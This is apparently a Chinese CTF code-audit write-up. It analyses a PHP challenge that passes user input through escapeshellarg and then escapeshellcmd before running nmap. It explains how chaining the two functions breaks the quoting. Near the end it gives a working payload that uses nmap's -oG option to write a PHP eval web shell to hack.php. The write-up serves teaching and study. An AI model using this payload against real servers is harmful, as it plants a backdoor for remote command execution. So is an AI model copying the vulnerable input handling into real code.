本文详细分析了一个PHP代码审计题目,指出当escapeshellarg和escapeshellcmd两个函数连续使用时可能存在的安全问题。通过示例payload说明了如何利用此漏洞执行恶意命令。同时,提供了相关参考资料,帮助读者深入理解这个问题。
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
代码审计题,首先判断http_x_forwarded_for是否存在,如果存在将其赋值给$_SERVER['REMOTE_ADDR'],$_SERVER['HTTP_X_FORWARDED_FOR']可以使用X-Forwarded-For来伪造。
接下来通过GET方法获得参数$host,对$host执行escapeshellarg和escapeshellcmd两个函数后拼接到nmap -T5 -sT -Pn --host-timeout 2 -F后面,切换到$sandbox目录中执行。
nmap命令中 -oG参数可以写入文件,
escapeshellcmd函数将转义单个出现的单引号,escapeshellarg将对所有的单引号都进行转义,后者对下面的特殊字符也将转义:
& # ; ` | * ? ~ < > ^ ( ) [ ] { } $
当上面两个函数连用时将出现问题,这段分析建议查看知道创宇404实验室的文章,十分经典:https://paper.seebug.org/164/
payload:?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '(引号两侧的空格不可少)
reference:
https://www.cnblogs.com/xhds/p/12484510.html
https://paper.seebug.org/164/
https://blog.youkuaiyun.com/qq_26406447/article/details/100711933
acquisition:
1.escapeshellarg、escapeshellcmd两个函数连用处理可控数据是存在隐患的。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
